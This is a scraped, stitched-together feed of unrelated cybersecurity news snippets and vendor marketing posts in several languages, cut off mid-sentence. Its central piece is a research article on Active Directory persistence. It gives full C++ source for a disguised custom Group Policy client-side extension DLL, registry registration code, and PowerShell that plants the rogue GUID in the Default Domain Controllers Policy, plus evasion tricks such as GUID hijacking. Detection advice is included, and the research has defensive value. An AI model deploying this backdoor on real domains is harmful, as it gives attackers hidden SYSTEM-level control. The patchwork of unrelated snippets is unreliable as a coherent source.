As mobile apps become increasingly central to business operations and user engagement, securing them from design to deployment has never been more critical. Threat modeling offers an essential first step in identifying and mitigating potential security risks early in the development process. It helps you think like an attacker, spotting weaknesses before they can be exploited.

Official Juniper Networks Blogs ジュニパーのデータセンターネットワークに切り替える8つの理由  データセンターネットワークは現在最も注目を集めている分野であり、多くの指標によれば、ジュニパーはこの分野で最も注目されるベンダーです。なぜ今注目を集めており、なぜジュニパーなのでしょうか？   まず、この分野がなぜこれほど注目されているのかを見てみましょう。最大の理由は、もちろんAIです。AIは、モデルトレーニングと推論の両方において高容量かつ高性能なAIワークロードを必要とするため、AIデータセンターへの大規模な新規投資を後押しします。    また、従来のデータセンターも、少なくとも2つの理由から、ここ数年でさらに注目を集めています。第1に、AIによる波及効果です。AIは、専用のAIデータセンターの構築を促すだけでなく、従来型のアプリケーションがすべてホストされている「フロントエンド」データセンターにおいても、トラフィックの増加を引き起こしています。    第2に、パブリッククラウドに対する見直しの動きです。ほぼすべてのものをパブリッククラウドに移行できると考えていた企業は、高騰するクラウドコストやベンダーロックインのリスクに直面し、戦略の見直しを迫られています。今後しばらくの間、ハイブリッド環境が主流になることは明らかであり、企業のワークロードの大多数がプライベートクラウドにとどまると考えられます。つまり、企業は引き続きプライベートデータセンターへの投資を行い、その最新化を進めて、ビジネスニーズに常時対応できる自動化された俊敏なプライベートクラウドインフラストラクチャを構築しなければなりません。   以上が、データセンターネットワーク市場が現在活況を呈している理由です。    では、ジュニパーが最も注目されているベンダーとなっている理由は何でしょうか？   私たちは、その理由は8つあると考えています。  ジュニパーネットワークスは、2025年度の「Gartner® Magic Quadrant™ for Data Center Switching」においてリーダーの1社に位置づけられました。これは最新のニュースですが、私たちにとっては長らく待ち望んでいた成果です。私たちは、急成長するこの市場において、データセンターネットワークソリューションに関する客観的な分析へのニーズが高まっていると考えています。そうした中から、Gartnerは今回初めて、データセンタースイッチング分野におけるMagic Quadrantを発表しました。ジュニパーがリーダーの1社として評価されたことは、ジュニパーがきわめて活況を呈しているこの分野において最も注目されるベンダーであることを示す、もう1つの確かな証拠であると私たちは捉えています。  ジュニパーネットワークスは、「Gartner Critical Capabilities for Data Center Switching」レポートにおいて、3つのユースケースのうち、エンタープライズデータセンターネットワークビルドアウトの分野で最高スコア、AIイーサネットファブリックビルドアウトの分野で第2位のスコアと評価されています。Critical CapabilitiesレポートはMagic Quadrantを補完するものであり、ベンダーの製品やソリューションに重点を置いた評価を行います。この評価は、ジュニパーが長年にわたり最高のデータセンターソリューションの構築に投資を行ってきたこと、そして800GスイッチングやAIデータセンターの分野での最近のリーダーシップが実を結んでいることの証しだと、私たちは考えています。ジュニパーのお客様は、すでにこうした状況を実感していました。今や、その価値を世界中が認めつつあります。 インサイトの向上 どれほど信頼性の高いデータセンターネットワークであっても、現実には予期しない問題が発生します。そのため、NetOps（ネットワーク運用）チームには、ネットワークおよびアプリケーションの問題を事前対応で迅速に検出し解決するためのツールが不可欠です。ジュニパー独自のアーキテクチャの利点は、他では得られないインサイトを得られることです。Juniper Apstra™コンテキストグラフは、ネットワークとアプリケーションのフローデータを統合し、Mist AIネイティブネットワーキングプラットフォームで構築された業界をリードするAIOpsツールと連携します。これにより、ネットワーク上のアプリケーションに対する予測的なインサイトが得られ、ネットワークの問題がアプリケーションのパフォーマンスやエンドユーザーエクスペリエンスに与える影響などを把握できます。NetOpsチームは、こうした問題を事前対応的に解決できるようになります。実際にジュニパーのお客様は、ネットワークアラーム件数の大幅な削減、トラブルシューティングに要する時間の短縮、アプリケーション認識、根本的原因分析および影響分析の機能の大幅な向上といった成果を実感しています。 最高速度の実現 ジュニパーは、Day 0の計画段階からDay 2以降の運用フェーズまで、データセンターのライフサイクル全体にわたって自動化を実現し、これによってあらゆるフェーズが迅速化します。Day 0では、スイッチングハードウェアの導入と同時にサービス開始が可能なソフトウェアベースの完全なデータセンター「デジタルツイン」を構築できる設計ツールをお客様に提供します。これにより、数週間かかっていたサービス開始までの期間を、数時間にまで短縮できます。このようなツールは、他のベンダーでは提供されていません。また、Day 2のプロビジョニングにおいても、Juniper Apstraを活用することで、従来の手法に比べてはるかに迅速な実施が可能になります。サービスプロビジョニングに要する時間が数時間からわずか数分へと最大20分の1に短縮されたお客様もいます。これにより、このお客様は煩雑な設定作業から解放され、ビジネスニーズを満たすサービスを提供することに集中できるようになりました。 強固な信頼性 データセンターネットワークにおける信頼性は、ミッションクリティカルなアプリケーションの高可用性要件を満たすために不可欠です。そして、ダウンタイムの最大の原因の1つが「ヒューマンエラー」です。CLIコマンドの入力ミス、現在のネットワーク構成が反映されない未更新の自動化スクリプト、一時的な対処のために追加されたまま放置されている設定など、手動によるプロセスには多くの落とし穴があり、こうした要因はデータセンターの停止やパフォーマンスの低下を引き起こします。ジュニパーのインテントベースの自動化は、こうした手動によるミスを基本的にすべて排除します。インテントに基づいてベンダー固有の適切な構成を自動生成し、数十に及ぶ妥当性チェックを通じてすべての変更を事前に検証し、リアルタイムで継続的なインテント検証を実施します。これにより、ネットワークの稼働状態がインテント通りであることを確認し、不一致があれば迅速に修正できます。これほどの機能を提供できる企業は、業界内の他のベンダーにはいません。 信頼性も、前述したスピードの優位性を実現するうえで重要な要素です。自動化プラットフォームが完全に検証された構成を提供し、ミスを排除していると信頼できなければ、新しいサービスを迅速に、安心して提供することはできません。ある大手電力インフラ事業者は、サービス変更を信頼できる形で迅速に適用するにあたっては、ジュニパーのソフトウェアが信頼に値すると判断しました。その結果、メンテナンスのスケジュールを組み、ビジネスに必要なサービスの提供を待機する必要がなくなりました。  The post ジュニパーのデータセンターネットワークに切り替える8つの理由  appeared first on Official Juniper Networks Blogs.

Improper configuration of DMARC and other email authentication protocols opens organizations to major threats

Official Juniper Networks Blogs 8 motivos incríveis para mudar para as redes de data center da Juniper  As redes de data são o assunto do momento, e, segundo inúmeros critérios, a Juniper é o fornecedor mais relevante neste espaço. Por que agora? E por que a Juniper?   The post 8 motivos incríveis para mudar para as redes de data center da Juniper  appeared first on Official Juniper Networks Blogs.

Threat hunters are alerting to a new campaign that employs deceptive websites to trick unsuspecting users into executing malicious PowerShell scripts on their machines and infect them with the NetSupport RAT malware. The DomainTools Investigations (DTI) team said it identified "malicious multi-stage downloader Powershell scripts" hosted on lure websites that masquerade as Gitcode and Docusign. "...

The intrusion follows a string of attacks that appear to be the work of the cybercrime gang Scattered Spider.

The intrusion follows a string of attacks that appear to be the work of the cybercrime gang Scattered Spider.

“Don’t be afraid, our robot overlords might just be better than the current ones.” I opened a recent talk with that tongue-in-cheek line, and while it got a chuckle, there’s a serious point behind it. As security professionals, we’ve grown accustomed to a parade of “next big things.” Cybersecurity is littered with miracle cures that […] The post Agentic AI: The Next Leap in Cybersecurity Evolution? appeared first on HUMAN Security.

Official Juniper Networks Blogs Ocho motivos de peso para pasarse a las redes de centro de datos de Juniper  Las redes de centro de datos están de moda y, entre los proveedores, hay un nombre que se repite todo el tiempo: Juniper. Pero ¿a qué se debe esta popularidad The post Ocho motivos de peso para pasarse a las redes de centro de datos de Juniper  appeared first on Official Juniper Networks Blogs.

Official Juniper Networks Blogs 8 buone ragioni per scegliere le reti data center di Juniper  Il networking per i data center è un tema caldissimo, e secondo molti indicatori Juniper è oggi il vendor più importante del settore. Ma perché proprio adesso? E perché proprio The post 8 buone ragioni per scegliere le reti data center di Juniper  appeared first on Official Juniper Networks Blogs.

Our perfect scores on the latest SE LABS Ⓡ tests reveal something even more important than perfect scores

Official Juniper Networks Blogs 8 goede redenen om over te stappen op een datacenternetwerk van Juniper  Datacenternetwerken zijn hot en Juniper wordt alom beschouwd als de meest toonaangevende leverancier ervan. Waarom nu, en waarom Juniper?   Hoe zijn datacenternetwerken zo populair geworden? De belangrijkste reden is natuurlijk The post 8 goede redenen om over te stappen op een datacenternetwerk van Juniper  appeared first on Official Juniper Networks Blogs.

In episode 53 of The AI Fix, our hosts suspect the CEO of Duolingo has been kidnapped by an AI, Sergey Brin says AIs work better if you threaten them with physical violence, Graham wonders how you put a collar on a headless robot dog, Mark asks why kickboxing robots wear head guards, and the CEO of Anthropic says AI could wipe out entry-level jobs. Graham asks your favourite AI how it feels about being kidnapped, and Mark explains how an AI tried to save itself by blackmailing the engineer responsible for turning it off. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.

If your CISO isn't wielding influence with the CEO and helping top leaders clearly see the flight path ahead, your company is dangerously exposed.

Official Juniper Networks Blogs 8 bonnes raisons de changer pour les réseaux de datacenter Juniper Les réseaux de datacenter ont le vent en poupe. Et sur ce segment de marché, Juniper apparaît comme une figure de proue à bien des égards. Alors, comment expliquer ce The post 8 bonnes raisons de changer pour les réseaux de datacenter Juniper appeared first on Official Juniper Networks Blogs.

Let’s face it: Vulnerability management (VM) has become a never-ending game of whack-a-mole. Alerts fly in by the thousands. Teams... The post Why it’s time to rethink vulnerability management appeared first on Sysdig.

Let’s face it: Vulnerability management (VM) has become a never-ending game of whack-a-mole. Alerts fly in by the thousands. Teams... The post Why it’s time to rethink vulnerability management appeared first on Sysdig.

Severity: Medium Security update addresses an exploited high severity vulnerability in Google Chrome for Windows Security update addresses an exploited high severity vulnerability in Google Chrome Updated: 03 Jun 2025

Out-of-band is becoming the norm rather than the exception Microsoft is patching another patch that dumped some PCs into recovery mode with an unhelpful error code.

A healthcare giant with dozens of facilities across Ohio is still recovering after shutting down nearly all its operations following a ransomware attack.

Cybersecurity researchers have disclosed details of a critical security flaw in the Roundcube webmail software that has gone unnoticed for a decade and could be exploited to take over susceptible systems and execute arbitrary code. The vulnerability, tracked as CVE-2025-49113, carries a CVSS score of 9.9 out of 10.0. It has been described as a case of post-authenticated remote code execution via...

The University of Oxford has introduced its first cyber resilience elective.

Learn how Commvault can help support compliance with Australian legislation. The post SOCI 101: Understanding the Security of Critical Infrastructure Act appeared first on Commvault - English - United States.

Crucial for applying Active Directory Group Policy Objects, client-side extensions (CSEs) are powerful but also present a significant, often overlooked, attack vector for persistent backdoors. Rather than cover well-documented common abuses of built-in CSEs, this article demonstrates how to create custom malicious ones. These are harder for defenders to identify than legitimate built-in CSEs used in malicious contexts, which have known globally unique identifiers.What are Group Policy Objects?Group Policy Objects (GPOs), a core feature of Active Directory (AD), allow administrators to centrally manage and configure operating systems, applications and user settings across all computers in a domain by configuring a set of rules and configurations. (Source: Microsoft)It is well-known that attackers with sufficient AD access can abuse GPOs for malicious actions like code execution, malware deployment, immediate scheduled tasks, privilege escalation, and stealthy persistence establishment; these techniques are generally well-documented.Each GPO comprises two main parts:The groupPolicyContainer object (GPC) in AD’s LDAP, holding metadata such as display names and CSE listsThe Group Policy Template (GPT) in AD’s SYSVOL share, containing the actual policy files and scriptsWhat are client-side extensions (CSEs)?Have you ever wondered how the settings defined in a GPO actually get applied on a client computer? The magic behind this process lies in the CSEs.CSEs are critical components that enable GPOs to apply specific settings such as software installation, registry edits, folder redirection, scheduled tasks, or Internet / power options and more to client machines.While Group Policy defines and distributes configuration policies across the network, it’s the CSE on the client side that interprets and enforces these policies. Each CSE is essentially a dynamic link library (DLL) file on the client Windows machine responsible for processing a particular type of Group Policy setting. When a computer processes GPOs, its Group Policy engine reads the policies and invokes the relevant CSEs to effectively apply the settings.The successful application of settings from a specific Group Policy area relies on the correct handling of CSEs. Even if a GPO is properly linked and the user/machine is included in the security filter, the settings it contains may fail to apply under two key conditions related to CSEs:The CSE is not installed and registered on the client machine.The CSE's GUID is not listed in the GPO's attributes.Therefore, both the local CSE availability and its correct reference within the GPO’s attributes are mandatory.What do CSEs look like on a client machine?Every CSE is uniquely identified by a Globally Unique Identifier (GUID). This GUID acts as the registration key and the link between the policy settings defined in the GPO and the processing logic (the DLL) on the client.While official Microsoft documentation mentions some CSEs, the list is incomplete. A more complete list can be found online. Also, the following PowerShell command can be executed on your machine to list them:Get-ChildItem "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions" | Select-Object @{Name='GUID';Expression={$_.PSChildName}}, @{Name='Name';Expression={$_.GetValue('')}}CSEs are registered in the registry under the following path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions On the left, under the GPExtensions key, you will find multiple subkeys, each named with the GUID of a specific CSE. The settings of each of them are defined on the right.Here are some important settings to be aware of: (Default): This is the name of the CSE.DllName: This the DLL corresponding to the CSE to be loaded by the GPO engine. The system searches for the DLL in the C:\Windows\System32 directory when a relative path is used. Alternatively, the full path to the DLL can be directly specified.NoGPOListChanges: If this value is 1, it indicates that it is not necessary to call the callback function (ProcessGroupPolicy) when there has been no change in the GPO.ProcessGroupPolicy: This is the name of the function exported by the library to be called by the GPO engine to apply the CSE settings.For detailed information on other functionalities, please consult the official Microsoft documentation on Creating a Policy Callback Function.What do CSEs look like in a GPO?When you configure settings within a specific GPO using the Group Policy Management Editor, the tool records which types of settings you've configured and the necessary CSEs. It does this by storing the GUIDs of these CSEs within attributes of the GPC object in AD.Specifically, you need to look at these two attributes on the GPC object:gPCMachineExtensionNames: This attribute lists the GUIDs of the CSEs required to process settings configured in the Computer Configuration section of the GPO.gPCUserExtensionNames: This does the same for user configuration.The expected format is the concatenation of the GUIDs: [][] etc. For example, if we analyze the gPCMachineExtensionNames attribute of the “Default Domain Policy” shown above, we can see that the first part of each GUID-pair in the screenshot above can be identified as a CSE:35378EAC-683F-11D2-A89A-00C04FBBCFA2: Registry/Administrative Template827D319E-6EAC-11D2-A4EA-00C04F79F83A: SecurityB1BE8D72-6EAC-11D2-A4EA-00C04F79F83A: EFSNote: CSE GUIDs within Group Policy attributes, such as gPCMachineExtensionNames, must be sorted in case-insensitive ascending order. If this order is not maintained, CSEs risk being ignored during Group Policy processing.The first GUID relates to the CSE function, and the second GUID in the pair is not important for today. For deeper GPO auditing insights, see Aurélien Bordes' 2019 SSTIC paper.Creating our own CSE for persistenceArticles discussing the malicious use of CSEs in AD often highlight two themes: the potential for red teams to abuse specific well-known CSEs, and the corresponding need for blue teams to track their execution. For instance:Scheduled Tasks {AADCED64-746C-4633-A97C-D61349046527}:“GPOddity: exploiting Active Directory GPOs through NTLM relaying, and more!”, Synacktiv (Quentin Roland)“Abusing GPO Permissions”, harmj0y (Will Schroeder)Files {7150F9BF-48AD-4DA4-A49C-29EF4A8369BA}:“Weaponizing Group Policy Objects Access”, TrustedSec (Jason Lang)Various CSEs:“A Red Teamer’s Guide to GPOs and OUs”, wald0 (Andy Robbins)Surprisingly, public methods or articles explaining how to abuse custom CSEs for this persistence method seem absent, especially given that Microsoft explains the CSE creation process itself. This obscurity is valuable to an attacker, offering inherent discretion through an unknown CSE GUID, plus the benefit of SYSTEM code execution capability.Let's proceed by creating a custom CSE to explore different ways attackers might leverage it for malicious purposes.Write it and compile itWe will use Visual Studio to create a custom CSE DLL with the friendly name “Group Policy Shell Configuration” and filename advshcore.dll (using base advshcore to appear inconspicuous in the System32 Windows folder). Create a new DLL project, name it “RogueCSE,” and click “Create” to begin.In your project, create advshcore.def and add this content:LIBRARY "advshcore" EXPORTS ProcessGroupPolicy DllRegisterServer PRIVATE DllUnregisterServer PRIVATEIn dllmain.cpp, now add the necessary includes, defines, and variables functions:#include "pch.h" #include // For Group Policy API #include #include #define ROGUECSE_PATH TEXT("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\GPExtensions\\{54a88399-50b3-4f44-8fe4-373fc441a1ac}") #define ROGUECSE_NAME TEXT("Group Policy Shell Configuration") // Fake name for the CSE // GUID for the custom CSE - could be any GUID // {54a88399-50b3-4f44-8fe4-373fc441a1ac} const GUID CSE_GUID = { 0x54a88399, 0x50b3, 0x4f44, { 0x8f, 0xe4, 0x37, 0x3f, 0xc4, 0x41, 0xa1, 0xac } };Implement the DllMain function as follows:BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: DisableThreadLibraryCalls(hModule); case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: break; } return TRUE; }Next, two helper functions are created. The first, a simple logger, proves privileged SYSTEM code execution by writing to a file. Though this example is benign, attackers could substitute malicious code, such as for a reverse shell, C2 agent, or NTDS.dit exfiltration to a public share.void LogToFile(const TCHAR* pszMessage) { FILE* pFile = NULL; _tfopen_s(&pFile, TEXT("C:\\RogueCSE.log"), TEXT("a+, ccs=UTF-8")); if (pFile) { SYSTEMTIME st; GetLocalTime(&st); _ftprintf(pFile, TEXT("[%02d/%02d/%04d %02d:%02d:%02d] %s\n"), st.wMonth, st.wDay, st.wYear, st.wHour, st.wMinute, st.wSecond, pszMessage); fclose(pFile); } }Next, a function logs the execution context:void LogExecutionContext() { // Get process information DWORD processId = GetCurrentProcessId(); TCHAR processPath[MAX_PATH] = { 0 }; DWORD processPathSize = GetModuleFileName(NULL, processPath, ARRAYSIZE(processPath)); TCHAR* processName = processPath; for (TCHAR* p = processPath; *p; p++) { if (*p == TEXT('\\') || *p == TEXT('/')) processName = p + 1; } TCHAR buffer[512]; if (processPathSize > 0) { _stprintf_s(buffer, ARRAYSIZE(buffer), TEXT("DLL loaded by process: %s (PID: %lu)"), processName, processId); } else { _stprintf_s(buffer, ARRAYSIZE(buffer), TEXT("DLL loaded by process with PID: %lu (couldn't get name, error: %lu)"), processId, GetLastError()); } LogToFile(buffer); // Get the current user TCHAR username[256] = { 0 }; DWORD usernameSize = ARRAYSIZE(username); if (GetUserName(username, &usernameSize)) { TCHAR buffer[512] = { 0 }; _stprintf_s(buffer, 512, TEXT("DLL running under user: %s"), username); LogToFile(buffer); } else { DWORD error = GetLastError(); TCHAR buffer[512] = { 0 }; _stprintf_s(buffer, 512, TEXT("Failed to get username, error code: %d"), error); LogToFile(buffer); } }We will now follow Microsoft's guidance for custom CSEs, implementing only the exported ProcessGroupPolicy function with minimal content for our test.DWORD CALLBACK ProcessGroupPolicy( DWORD dwFlags, HANDLE hToken, HKEY hKeyRoot, PGROUP_POLICY_OBJECT pDeletedGPOList, PGROUP_POLICY_OBJECT pChangedGPOList, ASYNCCOMPLETIONHANDLE pHandle, BOOL* pbAbort, PFNSTATUSMESSAGECALLBACK pStatusCallback) { // Log that the CSE was called LogToFile(TEXT("ProcessGroupPolicy called")); // Log both process and user information LogExecutionContext(); // Check if machine or user policy is being processed if (dwFlags & GPO_INFO_FLAG_MACHINE) { LogToFile(TEXT("Processing machine policy")); } else { LogToFile(TEXT("Processing user policy")); } return ERROR_SUCCESS; }And that’s it, we have all the minimum requirements for our own CSE.An extension can be registered here either manually or automatically:Manually: You can do this by creating all the required items, as we explained previously in the section “What do CSEs look like on a client machine?”Automatically: As described by Microsoft in the CSE documentation (and also in the Component Object Model -COM- documentation), the “DllRegisterServer” function can be implemented to allow self-registration using regsvr32.The automatic method requires “DllRegisterServer” and “DllUnregisterServer” to manage the following registry keys:The key associated with our GUID under HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions.(Default): “Group Policy Shell Configuration”.DllName: “advshcore.dll”.NoGPOListChanges: “0” to call the ProcessGroupPolicy function every time, even if there is no change in the GPO.ProcessGroupPolicy: We kept the suggested name here.///////////////////////////////////////////////////////////////////////////// // Register the CSE in the registry STDAPI DllRegisterServer(void) { HKEY hKey; LONG lResult; DWORD dwDisp, dwValue; lResult = RegCreateKeyEx(HKEY_LOCAL_MACHINE, ROGUECSE_PATH, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &hKey, &dwDisp); if (lResult != ERROR_SUCCESS) { return lResult; } RegSetValueEx(hKey, NULL, 0, REG_SZ, (LPBYTE)ROGUECSE_NAME, (lstrlen(ROGUECSE_NAME) + 1) * sizeof(TCHAR)); RegSetValueEx(hKey, TEXT("ProcessGroupPolicy"), 0, REG_SZ, (LPBYTE)TEXT("ProcessGroupPolicy"), (lstrlen(TEXT("ProcessGroupPolicy")) + 1) * sizeof(TCHAR)); RegSetValueEx(hKey, TEXT("DllName"), 0, REG_EXPAND_SZ, (LPBYTE)TEXT("advshcore.dll"), (lstrlen(TEXT("advshcore.dll")) + 1) * sizeof(TCHAR)); dwValue = 0; RegSetValueEx(hKey, TEXT("NoGPOListChanges"), 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(dwValue)); RegCloseKey(hKey); lResult = RegCreateKeyEx(HKEY_LOCAL_MACHINE, TEXT("SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\advshcore"), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &hKey, &dwDisp); if (lResult != ERROR_SUCCESS) { return lResult; } RegSetValueEx(hKey, TEXT("EventMessageFile"), 0, REG_SZ, (LPBYTE)TEXT("advshcore.dll"), (lstrlen(TEXT("advshcore.dll")) + 1) * sizeof(TCHAR)); dwValue = 7; RegSetValueEx(hKey, TEXT("TypesSupported"), 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(dwValue)); RegCloseKey(hKey); return S_OK; } // Removes CSE from the registry STDAPI DllUnregisterServer(void) { RegDeleteKey(HKEY_LOCAL_MACHINE, ROGUECSE_PATH); RegDeleteKey(HKEY_LOCAL_MACHINE, TEXT("SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\advshcore")); return S_OK; }The Solution Explorer should now show the project like this:RogueCSE ├── References ├── External Dependencies ├── Header Files ├── Resource Files ├── Source Files │ ├── advshcore.def │ ├── dllmain.cpp │ └── pch.cppBefore building, change the Visual Studio solution configuration to Release (x64) from its Debug (x64) default using the toolbar's dropdown menu. Then:Open the RogueCSE project properties (Right-click > Properties).Verify that Configuration is Release and Platform is x64.Under Configuration Properties > General:Set Target Name to “advshcore”.Under Configuration Properties > C/C++ > Code Generation:Change Runtime Library to Multi-threaded (/MT).Under Configuration Properties > Linker > Input:Enter “advshcore.def” for Module Definition File.Click “Apply” and then “OK” to save these project settings.Finally, build the solution by selecting Build > Build Solution from the main menu bar. Your custom DLL (“advshcore.dll”) is now ready to be registered as a new CSE.Registering our own CSERecall that this technique represents a novel persistence method, effectively creating a backdoor in the domain on targeted workstations and servers. For this example scenario, assume an attacker gains sufficient privileges (e.g., Domain Admins) to access and operate on a domain controller.On the compromised domain controller, the attacker would then perform these steps:Copy the previously created DLL file (“advshcore.dll”) to the C:\Windows\System32 folder.Register the DLL by executing the following command:regsvr32 "advshcore.dll"A confirmation will be displayed indicating that the DLL registration succeeded. You can verify in the registry that the custom CSE has been registered correctly. Loading and enabling our DLL through the Group Policy Client Service (GPSVC)As explained at the beginning of this article, a GPO only loads CSEs whose GUIDs are listed in its gPCMachineExtensionNames or gPCUserExtensionNames attributes. Therefore, to enable our custom CSE, we must now add its GUID to the gPCMachineExtensionNames attribute of the target GPO.We can use the following PowerShell code to perform this update:# Get the Default Domain Controllers Policy by its well-known GPO GUID $GPOdn = "CN={6AC1786C-016F-11D2-945F-00C04FB984F9},CN=Policies," + (Get-ADDomain).SystemsContainer $CurrentExtensions = Get-ADObject -Identity $GPOdn -Properties gPCMachineExtensionNames | Select-Object -ExpandProperty gPCMachineExtensionNames # The second GUID can be a NULL GUID as Microsoft suggests "Vendors can specify a NULL GUID for the tool extension GUID" (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gpol/b4e136b5-5f8f-41dd-9f16-77cf19854e76) # or anything (cf. "What do CSEs look like in a GPO?" section) $CustomCSE = "[{54a88399-50b3-4f44-8fe4-373fc441a1ac}{00000000-0000-0000-0000-000000000000}]" if (-not ($CurrentExtensions.Contains($CustomCSE))) { $NewExtensions = $CustomCSE + $CurrentExtensions Set-ADObject -Identity $GPOdn -Replace @{gPCMachineExtensionNames = $NewExtensions} Write-Host "Successfully added custom CSE to Default Domain Controllers Policy" }Next, either wait for the Group Policy refresh cycle, which typically takes about five minutes on domain controllers, or trigger an immediate update by running gpupdate /force on the test domain controller.After the policy refresh, verify that the C:\RogueCSE.log file has been created with content like: Note that the custom code within the CSE DLL runs in the Group Policy Client service context (GPSVC) and with highly privileged SYSTEM permissions.Observing the log file over time confirms that the custom CSE code executes during each Group Policy refresh cycle. On the domain controller, this refresh occurs at the short interval mentioned earlier of around 5 minutes. This persistence method also works on member machines, although their default refresh interval is significantly longer – approximately 90 minutes, plus a random offset.In summary, a custom CSE, advshcore.dll, was successfully deployed to a DC, demonstrating basic logging. This served as a proof-of-concept but also highlighted significant abuse potential. Adversaries could exploit Group Policy infrastructure for stealthy communication channels or persistent backdoors. Leveraging native OS features instead of external malicious tools makes this technique difficult to detect through forensic analysis or threat identification. This underscores the vital need for vigilant monitoring and strict security controls for GPOs and CSEs in AD environments.Weaponizing a custom CSE across the network: potential scenariosWith the fundamental steps covered, let's consider broader application. An attacker with domain privileges (e.g., Domain Admin) could propagate this CSE-based persistence across the network.To distribute the payload, the attacker might place the DLL in an inconspicuous SYSVOL location like \\SYSVOL\\scripts\SecurityProviders, making it domain-accessible. We will now explore various approaches, analyzing their strengths and weaknesses.Increased reliability at the cost of detectabilityTo ensure reliable deployment, especially for intermittently connected endpoints, attackers might use Files Group Policy Preference to copy the custom CSE DLL locally, allowing its registry path to point to this local file. A GPO, often using a startup script, can then register this local CSE. Its gPCMachineExtensionNames attribute must also be updated with the GUIDs of any required built-in CSEs and the custom one.Although robust, this deployment method increases detectability due to significant GPO changes and the typical use of known CSEs for payload delivery, a pattern often monitored. Detecting such activity can involve Windows Event Log analysis, including:Security Event ID 5145: Monitor this event to detect write access to the SYSVOL share. This can identify when the malicious DLL is written, or when files related to Group Policy settings for Files Preferences, Scheduled Tasks, or Startup Scripts are created or modified within SYSVOL.  Security Event ID 4688 “A new process has been created”: Monitor this event, specifically its "Process Command Line" field, to detect specific types of process execution. This can identify when a startup script is run or a process is launched by an immediate scheduled task. Task Scheduler Operational Event ID 201: Monitor this event to identify the specifics of completed scheduled tasks. This can reveal the task name (e.g., "Test2") and the action it performed (e.g., running ‘cmd.exe’).  gPCMachineExtensionNames attribute: Finally, monitor this critical attribute for unauthorized changes. These can be found via LDAP queries or Security Event ID 5136,which logs directory object modifications. Note: The discussed large-scale deployment methods using common Group Policy features (Files GPP, Scripts, Scheduled Tasks) often trigger blue team alerts.Enhanced stealth at the cost of reliabilityAlternatively, a custom CSE DLL can be hosted on a network share, instead of being copied locally, and loaded via its registered network path. For our straightforward example, SYSVOL will serve as this share, and the DLL's registered path will point there.  PowerShell cmdlets like New-ItemProperty offer an alternative to regsvr32.exe for CSE DLL registration, potentially bypassing common monitoring of regsvr32 (documented by the MITRE ATT&CK T1218.010). This remote-scriptable method lacks GPO-based persistence – the backdoor won't be reapplied by GPO if altered – but offers stealth: a GPO attribute having only a custom GUID might bypass certain defenses.GUID hijacking is another stealthy approach: attackers redirect an unused legitimate CSE's registered DLL path to a malicious one. Adding this compromised but valid-looking GUID to a GPO can bypass defenses that only check GUIDs, not DLL paths.These examples show custom malicious CSEs' covert potential.ConclusionAbusing custom CSEs can create stealthy backdoors into AD environments. Attackers can deploy custom DLLs and register them as CSEs, and then manipulate GPOs to load these malicious extensions. This technique leverages trusted Windows components, making it difficult to detect using standard security measures.Traditional detections often focus on famously abused CSEs, such as those for Scheduled Tasks or Startup Scripts. However, registering and deploying a custom CSE can be achieved without these easily identifiable actions, bypassing common alerts. Techniques like hosting the DLL on a network share and directly modifying the registry can further reduce detectability, though these methods might trade off reliability. Alternatively, hijacking an unused built-in CSE GUID and altering its DLL path can be a particularly evasive strategy.While the initial registration of a custom CSE can be detected, once the backdoor is configured within a GPO, identifying it becomes challenging. The CSE code runs with SYSTEM privileges during each Group Policy refresh cycle, offering persistent and potentially long-term control to an attacker. This highlights the importance of rigorously monitoring CSE registrations and GPO modifications, as well as examining event logs for unexpected activity related to Group Policy Client Service (GPSVC) and changes in the gPCMachineExtensionNames attribute. Regularly checking for custom CSEs as Tenable Identity Exposure does through the GPO Execution Sanity Indicator of Exposure is essential for securing Active Directory environments.

Curated threat intelligence takes raw threat data from various sources and selects, validates, and organizes it into a structured and actionable format. This intelligence gives insight into threat actors' activities and tactics, techniques, and procedures (TTPs) to help improve an organization's cybersecurity posture...

The ransomware group identified as Blacklock has allegedly updated its dark web leak site, claiming to have successfully targeted four new entities. This group is known for exfiltrating data from its victims and then threatening to publicly release it if their ransom demands are not met. The appearance of these companies on the group’s list […]

SafePay took the top spot among ransomware groups in May 2025, solidifying the group’s status as a major threat. Overall, ransomware groups claimed 384 victims in May (chart below), the third straight monthly decline, as leadership continues to shift after RansomHub – the top group for more than a year – went offline at the end of March in what may have been an infrastructure compromise by rival DragonForce. We’ll look at SafePay, along with DevMan, another emerging ransomware actor, as well as other key ransomware developments that occurred in May. Top Ransomware Groups SafePay, with 58 claimed victims, took over the top spot from April leader Qilin, which claimed 54 victims in May. Play, Akira, and NightSpire rounded out the top five ransomware groups (chart below). The overall numbers may increase somewhat as late data is processed, but all indications are that SafePay will remain in the top spot when all data is finalized. The U.S. was once again the most targeted country with 181 victims, more than seven times greater than second-place Germany (chart below). Professional Services and Construction were by far the most attacked sectors, totaling 101 attacks between them. Manufacturing, Government, Healthcare, Finance, IT, Transportation, Consumer Goods, and Education rounded out the top 10 targeted industries (chart below). SafePay, DevMan Emerge as Threats SafePay has claimed 198 victims since the ransomware group first emerged in fall 2024, according to Cyble threat intelligence data. The group’s previous high was 43 victims in March 2025. May was the first month that SafePay led all ransomware groups in claimed victims. The group has been observed gaining initial access via VPN and RDP connections, often using stolen credentials or password spraying attacks. SafePay uses double-extortion techniques, exfiltrating data before encrypting it and threatening to leak stolen data unless the ransom is paid. SafePay claims not to offer Ransomware-as-a-Service (RaaS), unlike other groups that often rely on affiliates. SafePay has so far shown a preference for targets in the U.S. and Germany, with German attacks in particular well above the mean, and while the group has shown the ability to attack a 